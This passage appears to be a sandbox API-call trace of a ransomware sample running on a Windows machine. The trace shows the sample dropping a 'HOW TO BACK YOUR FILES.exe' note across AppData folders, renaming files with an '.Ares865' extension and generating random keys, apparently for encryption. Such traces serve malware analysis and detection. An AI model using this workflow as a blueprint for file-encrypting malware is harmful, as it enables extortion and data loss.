lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections" [0108.467] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.467] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\network\\connections\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.468] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.468] GetLastError () returned 0x0 [0108.468] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections\\Pbk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections\\Pbk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections\\Pbk" [0108.468] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x325078 | out: hHeap=0x2b0000) returned 1 [0108.468] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0108.468] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections\\Pbk") returned 80 [0108.468] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections\\Pbk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections\\Pbk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections\\Pbk" [0108.468] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.469] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections\\Pbk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\network\\connections\\pbk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.469] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.469] GetLastError () returned 0x0 [0108.470] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" [0108.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0108.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0108.470] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned 91 [0108.470] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" [0108.470] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.470] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.470] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.471] GetLastError () returned 0x0 [0108.471] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk.Ares865") returned 112 [0108.471] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\rasphone.pbk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\rasphone.pbk.ares865"), dwFlags=0x1) returned 1 [0108.473] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\rasphone.pbk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.473] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0108.473] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0108.473] CloseHandle (hObject=0x0) returned 0 [0108.473] CloseHandle (hObject=0x118) returned 1 [0108.473] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rasphone.pbk", cAlternateFileName="")) returned 0 [0108.473] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0108.473] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7810 [0108.474] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project" [0108.474] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d00 | out: hHeap=0x2b0000) returned 1 [0108.474] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0108.474] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project") returned 67 [0108.474] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project" [0108.474] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.474] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\ms project\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.474] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.475] GetLastError () returned 0x0 [0108.475] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project\\14", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project\\14") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project\\14" [0108.475] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x321060 | out: hHeap=0x2b0000) returned 1 [0108.475] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0108.475] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project\\14") returned 70 [0108.475] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project\\14" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project\\14") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project\\14" [0108.475] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.475] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project\\14\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\ms project\\14\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.476] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.476] GetLastError () returned 0x0 [0108.476] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project\\14\\1033", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project\\14\\1033") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project\\14\\1033" [0108.476] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335068 | out: hHeap=0x2b0000) returned 1 [0108.476] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0108.476] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project\\14\\1033") returned 75 [0108.476] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project\\14\\1033" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project\\14\\1033") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project\\14\\1033" [0108.477] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.477] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project\\14\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\ms project\\14\\1033\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.477] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.477] GetLastError () returned 0x0 [0108.478] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project\\14\\1033\\Global.MPT.Ares865") returned 94 [0108.478] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project\\14\\1033\\Global.MPT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\ms project\\14\\1033\\global.mpt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project\\14\\1033\\Global.MPT.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\ms project\\14\\1033\\global.mpt.ares865"), dwFlags=0x1) returned 1 [0108.479] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MS Project\\14\\1033\\Global.MPT.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\ms project\\14\\1033\\global.mpt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.480] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=390656) returned 1 [0108.480] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f07c0) returned 1 [0108.481] CryptGenRandom (in: hProv=0x2f07c0, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.481] CryptReleaseContext (hProv=0x2f07c0, dwFlags=0x0) returned 1 [0108.501] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f07c0) returned 1 [0108.501] CryptGenRandom (in: hProv=0x2f07c0, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.501] CryptReleaseContext (hProv=0x2f07c0, dwFlags=0x0) returned 1 [0108.507] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MMC", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MMC") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MMC" [0108.507] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0160 | out: hHeap=0x2b0000) returned 1 [0108.507] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0108.507] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MMC") returned 60 [0108.507] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MMC" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MMC") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MMC" [0108.507] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.507] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\MMC\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\mmc\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.508] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.508] GetLastError () returned 0x0 [0108.509] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer" [0108.509] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0108.509] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0108.509] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer") returned 74 [0108.509] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer" [0108.509] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.509] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.510] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.510] GetLastError () returned 0x0 [0108.510] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData" [0108.510] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x325078 | out: hHeap=0x2b0000) returned 1 [0108.510] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0108.510] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData") returned 83 [0108.510] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData" [0108.510] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.510] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\userdata\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.511] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.511] GetLastError () returned 0x0 [0108.512] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low" [0108.512] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0108.512] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0108.512] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low") returned 87 [0108.512] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low" [0108.512] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.512] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\userdata\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.512] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.513] GetLastError () returned 0x0 [0108.513] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat.Ares865") returned 105 [0108.513] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\userdata\\low\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\userdata\\low\\index.dat.ares865"), dwFlags=0x1) returned 1 [0108.514] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\userdata\\low\\index.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.515] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32768) returned 1 [0108.515] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f01e8) returned 1 [0108.516] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.516] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.520] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f01e8) returned 1 [0108.521] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.521] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.522] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E" [0108.522] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ca068 | out: hHeap=0x2b0000) returned 1 [0108.522] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0108.522] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application 